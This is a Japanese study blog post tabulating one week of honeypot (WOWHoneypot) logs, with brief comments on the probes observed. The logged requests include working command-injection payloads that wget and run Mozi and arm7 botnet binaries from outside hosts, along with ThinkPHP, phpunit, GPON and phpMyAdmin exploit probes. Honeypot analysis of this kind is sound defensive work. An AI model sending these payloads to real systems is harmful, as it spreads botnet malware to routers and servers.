家studyをつづって

IT技術に関することやセキュリティ、ガイドライン等学んだことをつづっていきます。

Wowhoneypotログ分析(2020/05/11-2020/05/17)

概要

以前の記事で構築したWowhoneypotのログを集計した結果です。

 

 

 

対象期間

2020/05/11-2020/05/17

 

ログの集計

送信元 内容 検知数
    0
110.154.182.132 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 1
111.231.142.223 \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
113.173.214.13 \"GET /operator/basic.shtml?id=1337 1
  \"GET /sess-bin/login_session.cgi 2
  \"GET /setup.cgi 2
  \"GET /shell?/bin/busybox+ABCD 3
  \"POST /doLogin 1
115.134.25.118 \"POST /cgi-bin/mainfunction.cgi 1
116.207.220.101 \"POST /cgi-bin/mainfunction.cgi 2
12.175.89.10 \"POST /cgi-bin/mainfunction.cgi 1
124.118.64.244 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.45.29.4:36758/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1
125.14.48.207 \"GET /favicon.ico 2
134.255.234.161 \"GET /phpMyAdmin/scripts/setup.php 13
  \"POST /phpMyAdmin/scripts/setup.php 13
14.241.249.199 \"POST /cgi-bin/mainfunction.cgi 1
141.105.87.106 \"POST /boaform/admin/formPing 1
141.237.69.118 \"GET /shell?cd+/tmp;rm+-rf+*;wget+%20172.245.52.231/jaws;sh+/tmp/jaws 1
151.99.146.218 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
154.126.79.223 \"GET /adv 2
156.96.155.242 \"GET /admin/ 2
  \"GET /agSearch/SQlite/main.php 2
  \"GET /dbadmin/ 2
  \"GET /HNAP1/ 2
  \"GET /hudson/script 2
  \"GET /main.php 2
  \"GET /myadmin/ 2
  \"GET /mysql-admin/ 2
  \"GET /mysql/ 2
  \"GET /mysqladmin/ 2
  \"GET /mysqlmanager/ 2
  \"GET /openserver/phpmyadmin/ 2
  \"GET /p/m/a/ 2
  \"GET /php-my-admin/ 2
  \"GET /php-myadmin/ 2
  \"GET /phpmanager/ 2
  \"GET /phpmy-admin/ 2
  \"GET /phpMyAdmin-2.2.3/ 2
  \"GET /phpMyAdmin-2.2.6/ 2
  \"GET /phpMyAdmin-2.5.1/ 2
  \"GET /phpMyAdmin-2.5.4/ 2
  \"GET /phpMyAdmin-2.5.5-pl1/ 2
  \"GET /phpMyAdmin-2.5.5-rc1/ 2
  \"GET /phpMyAdmin-2.5.5-rc2/ 2
  \"GET /phpMyAdmin-2.5.5/ 2
  \"GET /phpMyAdmin-2.5.6-rc1/ 2
  \"GET /phpMyAdmin-2.5.6-rc2/ 2
  \"GET /phpMyAdmin-2.5.6/ 2
  \"GET /phpMyAdmin-2.5.7-pl1/ 2
  \"GET /phpMyAdmin-2.5.7/ 2
  \"GET /phpMyAdmin-2.6.0-alpha/ 2
  \"GET /phpMyAdmin-2.6.0-alpha2/ 2
  \"GET /phpMyAdmin-2.6.0-beta1/ 2
  \"GET /phpMyAdmin-2.6.0-beta2/ 2
  \"GET /phpMyAdmin-2.6.0-pl1/ 2
  \"GET /phpMyAdmin-2.6.0-pl2/ 2
  \"GET /phpMyAdmin-2.6.0-pl3/ 2
  \"GET /phpMyAdmin-2.6.0-rc1/ 2
  \"GET /phpMyAdmin-2.6.0-rc2/ 2
  \"GET /phpMyAdmin-2.6.0-rc3/ 2
  \"GET /phpMyAdmin-2.6.0/ 2
  \"GET /phpMyAdmin-2.6.1-pl1/ 2
  \"GET /phpMyAdmin-2.6.1-pl2/ 2
  \"GET /phpMyAdmin-2.6.1-pl3/ 2
  \"GET /phpMyAdmin-2.6.1-rc1/ 2
  \"GET /phpMyAdmin-2.6.1-rc2/ 2
  \"GET /phpMyAdmin-2.6.1/ 2
  \"GET /phpMyAdmin-2.6.2-beta1/ 2
  \"GET /phpMyAdmin-2.6.2-pl1/ 2
  \"GET /phpMyAdmin-2.6.2-rc1/ 4
  \"GET /phpMyAdmin-2.6.2/ 2
  \"GET /phpMyAdmin-2.6.3-pl1/ 2
  \"GET /phpMyAdmin-2.6.3-rc1/ 2
  \"GET /phpMyAdmin-2.6.3/ 4
  \"GET /phpMyAdmin-2.6.4-pl1/ 2
  \"GET /phpMyAdmin-2.6.4-pl2/ 2
  \"GET /phpMyAdmin-2.6.4-pl3/ 2
  \"GET /phpMyAdmin-2.6.4-pl4/ 2
  \"GET /phpMyAdmin-2.6.4-rc1/ 2
  \"GET /phpMyAdmin-2.6.4/ 2
  \"GET /phpMyAdmin-2.7.0-beta1/ 2
  \"GET /phpMyAdmin-2.7.0-pl1/ 2
  \"GET /phpMyAdmin-2.7.0-pl2/ 2
  \"GET /phpMyAdmin-2.7.0-rc1/ 2
  \"GET /phpMyAdmin-2.7.0/ 2
  \"GET /phpMyAdmin-2.8.0-beta1/ 2
  \"GET /phpMyAdmin-2.8.0-rc1/ 2
  \"GET /phpMyAdmin-2.8.0-rc2/ 2
  \"GET /phpMyAdmin-2.8.0.1/ 2
  \"GET /phpMyAdmin-2.8.0.2/ 2
  \"GET /phpMyAdmin-2.8.0.3/ 2
  \"GET /phpMyAdmin-2.8.0.4/ 2
  \"GET /phpMyAdmin-2.8.0/ 2
  \"GET /phpMyAdmin-2.8.1-rc1/ 2
  \"GET /phpMyAdmin-2.8.1/ 2
  \"GET /phpMyAdmin-2.8.2/ 2
  \"GET /phpMyAdmin-2/ 2
  \"GET /phpmyadmin/ 4
  \"GET /phpmyadmin2/ 4
  \"GET /PMA/ 4
  \"GET /PMA2005/ 4
  \"GET /script 2
  \"GET /sqlite/main.php 6
  \"GET /SQLiteManager-1.2.4/main.php 2
  \"GET /sqlitemanager/main.php 4
  \"GET /sqlmanager/ 2
  \"GET /sqlweb/ 2
  \"GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php 2
  \"GET /webadmin/ 2
  \"GET /webdb/ 2
  \"GET /websql/ 2
  \"GET http://www.msftncsi.com/ncsi.txt 2
162.243.135.71 \"GET /hudson 1
162.243.140.80 \"GET /portal/redlion 1
162.243.142.207 \"GET /hudson 1
162.243.144.106 \"GET /portal/redlion 1
162.243.144.196 \"GET /hudson 1
162.243.144.204 \"GET /ReportServer 1
170.246.149.166 \"POST /cgi-bin/mainfunction.cgi 1
173.215.49.220 \"POST /cgi-bin/mainfunction.cgi 1
175.136.165.166 \"GET /operator/basic.shtml?id=1337 1
  \"GET /sess-bin/login_session.cgi 1
176.113.161.89 \"POST /GponForm/diag_Form?images/ 1
181.129.133.164 \"POST /cgi-bin/mainfunction.cgi 1
181.169.232.175 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
185.128.41.50 \"GET /manager/html 181
185.176.27.114 \"GET /favicon.ico 1
  \"GET /robots.txt 1
190.217.1.21 \"POST /cgi-bin/mainfunction.cgi 1
194.127.172.192 \"GET //Admin/scripts/setup.php 5
  \"GET //myadmin/scripts/setup.php 10
  \"GET //phpMyAdmin/scripts/setup.php 10
  \"GET //pma/scripts/setup.php 5
  \"GET /muieblackcat 5
194.190.49.175 \"POST /cgi-bin/mainfunction.cgi 1
195.54.160.121 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 9
  \"GET /?XDEBUG_SESSION_START=phpstorm 9
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 8
  \"GET /solr/admin/info/system?wt=json 9
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 3
  \"POST /api/jsonws/invoke 8
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2
195.54.160.123 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 1
  \"GET /?XDEBUG_SESSION_START=phpstorm 1
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 1
  \"GET /solr/admin/info/system?wt=json 1
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
  \"POST /api/jsonws/invoke 1
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
196.3.200.96 \"POST /cgi-bin/mainfunction.cgi 1
198.20.103.178 \"GET /login.html 1
2.42.46.214 \"POST /cgi-bin/mainfunction.cgi 1
2.50.125.47 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
201.142.204.200 \"POST /cgi-bin/mainfunction.cgi 1
202.3.134.174 \"GET /login.htm 1
202.40.191.116 \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
206.225.74.190 \"POST /cgi-bin/mainfunction.cgi 1
223.155.167.162 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1
223.155.182.227 \"POST /GponForm/diag_Form?images/ 1
27.74.251.241 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
41.204.75.106 \"POST /cgi-bin/mainfunction.cgi 2
41.251.206.70 \"POST /cgi-bin/mainfunction.cgi 1
41.41.153.43 \"POST /cgi-bin/mainfunction.cgi 1
45.13.93.82 \"CONNECT ip.ws.126.net:443 2
45.13.93.90 \"CONNECT ip.ws.126.net:443 2
49.233.186.160 \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
49.49.242.97 \"GET /manager/html 1
49.70.190.45 \"POST /GponForm/diag_Form?images/ 1
5.101.0.209 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 2
  \"GET /?XDEBUG_SESSION_START=phpstorm 2
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 2
  \"GET /solr/admin/info/system?wt=json 2
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2
  \"POST /api/jsonws/invoke 2
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2
51.158.168.21 \"GET /* 1
  \"GET /form 1
  \"GET /helpz 1
  \"GET /httpz 1
  \"GET /loginz 1
  \"GET /statusz 2
68.183.93.200 \"GET /myadmin/scripts/setup.php 2
  \"GET /phpMyAdmin/scripts/setup.php 2
  \"GET /pma/scripts/setup.php 1
  \"GET /w00tw00t.at.blackhats.romanian.anti-sec:) 1
68.71.66.207 \"POST /cgi-bin/mainfunction.cgi 1
72.138.37.2 \"POST /cgi-bin/mainfunction.cgi 1
77.247.108.77 \"GET /admin/ 1
80.82.78.104 \"POST /editBlackAndWhiteList 1
81.29.192.212 \"GET /bc9615d267dba809638d9fbc9eb55236.php 1
  \"GET /D90A75ABEFF190F2A31DA59546864E43.php 1
  \"GET /dbf772166781764452a2d50883ed1d63.php 1
  \"GET /phpmyadmin/index.php 2

 

 

コメント

  • NetGear DGN1000に対するリモートからのコード実行
    \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1

    www.exploit-db.com



  • 「GET /manager/html」を181回検知している。(前の期間では514回)
    上記はApache Tomcatに対する攻撃と推測。増えた理由は不明。
  • 全体的にPHPの開発環境に対する攻撃が多い。
  • 「muieblackcat」は、ウクライナ(?)で盛んなボットで、PHPの脆弱性を探索する攻撃らしい。

    qastack.jp